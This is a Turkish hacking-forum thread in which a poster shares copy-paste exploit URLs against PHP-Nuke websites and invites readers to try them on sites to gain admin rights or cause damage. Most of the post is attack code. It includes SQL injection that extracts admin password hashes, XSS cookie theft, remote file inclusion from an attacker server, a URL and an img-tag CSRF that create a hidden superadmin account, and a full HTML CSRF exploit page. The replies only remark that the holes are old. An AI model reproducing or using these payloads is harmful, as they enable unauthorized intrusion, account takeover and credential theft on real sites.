Online Hacking PHP

YoUcAnCall911

YoUcAnCall911

Kadim Dost
Katılım
19 Haz 2005
Mesajlar
166
Reaction score
0
Puanları
0
Konum
Cehennemin Dibinden...
Arkadaşlar verildi mi bilmiyorum 17 sayfa başlık var verildi ise yeni seyler de ekleriz, değiştiririz birseyler yaparız. Benim hacke ilk başladıgım noktadır php acıkları...

Aşağıdaki kodları internet exlorerınızın adres cubuguna siteadı olan bölümü düzenleyerek yazdığınızda eger sitede acık varsa kolayca admin yetkilerine ulaşır ya da siteye zarar verirsiniz.. Denemesi kolay ve bedava...


Önizleme moduna saldırı
Kod:
Kod: 
http://www.siteninadı.com/phpnukeyolu/modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&[email protected]&reviewer=f00&score=9999




Kod:
Kod: 
http://www.siteninadı.com/phpnukeyolu/modules.php?name=Reviews&rop=savecomment&id=1&uname=f00bar&score=999999999999999999999999




Sistemden cookie çalma bu yolla admin gibi login olabilirsiniz yada md5 hash ini crackliyebilirsiniz




Kod:
Kod: 
http://www.siteninadı.com/phpnukeyolu/modules.php?name=Reviews&rop=postcomment&id='&title=a
bu kod çalışmazsa geri tuşuna basın bidaha ileri tuşuna basın karşınıza admin id si ile md5 hash i gelicektir

"admin.php" yoluna ulaşmak
Kod:
Kod: 
http://www.siteninadı.com/phpnukeyoluadmin/case/case.adminfaq.php/admin.php?op=FaqCatGo
http://www.siteninadı.com/phpnukeyolu/admin/admin.php/index.php
http://www.siteninadı.com/phpnukeyolu/admin/modules/blocks.php/admin.php

bu tehlikeli açıklardan biridir phpnuke portalına belirlediğinz dosyalar eklenir adam girdiğinde o dosya yada kod bilgisayarınıza iner oto çalıştırılabilir


Kod:
Kod: 
http://www.siteninadı.com/phpnukeyolu/index.php?modpath=ftp://ftpadresiniz.com/dizin/
http://www.siteninadı.com/phpnukeyolu/index.php?modpath=//saldırganın ip si/bilgisayardaki klasörün adı/

cross site scripting le önemli bilgilere ulaşmak cookie hash vs.vs


Kod:
Kod: 
http://wwwsiteninadı.com/nukeyolu/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=[xss code here]&thold=0 

http://www.siteninadı.com/nukeyolu/modules.phpname=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=[xss code here] 

http://www.siteninadı.com/nukeyolu/index.php?foo=bar%20union%20select%20<script>alert(document.cookie);</script> 

http://www.siteninadı.com/nukeyolu/modules.php?name=Web_Links&l_op=viewlink&cid=1&show=foobar

"modules.php" yardımıyla siteden bilgi çalma yönetim paneline login:
Kod:
Kod: 
http://www.siteninadı.com/nukeyolu/modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radmins
uper=1/**/LIMIT/**/1/*


cookie ayıklama kodundaki hatadan kaynaklanaan sitede herhangi bir script çalıştırılması yada istenilen kişinin cookie aracılıyla hash inin bulunması


Kod:
Kod: 
http://siteninadı.com/nukeyolu/index.php?user=MTo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk7PC9zY3JpcHQ%2bZm9vYmFy

sql injection açığı
database modifiye edilmeye olanak verir admin eklenebilir ve önemli bilgilere ulaşılabilir hash özel mesja yoluyla alınır

Kod:
Kod: 
http://www.siteninadı.com/nukeyolu/modules.php?name=Private_Messages&file=index&folder=inbox&user=eDpmb28nIFVOSU9OIFNFTEVDVCAyLG51bGwsMSwxLG51bGwvKjox

Admin oluşturma:

Kod:
Kod: 
http://www.siteninadı.com/nukeyolu/admin.php?op=AddAuthor&add_aid=youcancall911&add_name=God&add_pwd=911911&[email protected]&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox

Kullanıcı adı: youcancall911 şifre 911911 yapmak için yukarıdaki komutu kullanabilirsiniz.

image tagların arasına eklenicek kodla admin eklenmesi [.img]kod[./img] gibi

Kod:
Kod: 
[img]http://www.example.com/admin.php?op=AddAuthor&add_aid=youcancall911&add_name=God&add_pwd=911911 &[email protected]&add_radminsuper=1[/img]



Kullanıcı adı: youcancall911 şifre 911911 yapmak için yukarıdaki komutu kullanabilirsiniz. img taglarla belirlenmiş kod admin tarafından okunduğunda god admin olursunuz ve silinemezsiniz.

search engine açığı md5 e ulaşmak için:
Kod: 
http://www.siteninadı.com/nukeyolu/search?q=Maty+Scripts%27UNION SELECT pwd from nuke_authors where name%3d%27God%27 AND IF(mid(pwd,1,1)%3d3,benchmark(150000,md5(1337)),1)/*" 

[B]"error.php" açığı sitenin devamlı hata vermesini sağlar.[/B] 

[code]http://www.siteninadı.com/phpyolu/error.php?newlang=dropby23
yukardaki kodla etkilenmiş siteyi aşağıdaki kodla bi index.hrm hazırlayın ve sadece ona tıklamanız yeterli adminsiniz
Kod: 
<HTML> 
<HEAD><TITLE>Error Manager sploit</TITLE> 
</HEAD> 
<BODY bgcolor="#000000" text="#FFFFFF"> 
<br><br><br> 
<center> 

<FORM action="http://www.sitebibadı.com/error.php" method="POST"> 

<input type="hidden" name="error" value="<img width='0' height='0' border='0' 
src='http://www.victim.com/admin.php?op=AddAuthor&add_aid=youcancall911&add_name=God&add_pwd=911911&[email protected]&add_radminsuper=1'></img>404"> 
<input type="submit" value="Attack"> 

</FORM> 

[B]Hata sayfası olarak bu kodu hazırlayın inde.htm ve adminin görmesini sağlayın ve adminsiniz [/B] 
[B]Kullanıcı adı: youcancall911 şifre 911911 olacaktır. [/B]  

</center> 
<br><br><br> 

</BODY> 
</HTML>

Kendi yazdıklarıma ulaşamadığım için başka biryerden alıntı yaptım. Bilginize...
 
Güzel bilgiler Ama bu Kodların Coqu Eski Ve Artık o Açıkları bulmak Çok zor ..
 
öncelikle ellerine sağlık ama bu açıklar yeni sürümlerde kapatıldı eskilerdede malesef :) güncelleme yada açığını kapatmayan belki birkaç kişi çıkar e oda şansa kalmış artık :) genede teşekkürler dostum
 
eLine sagLik :) eski acikLar ama yine de ishe yaradigi yerler war ;)
 
Cevap yazmak için giriş yap yada kayıt ol.
Geri
Üst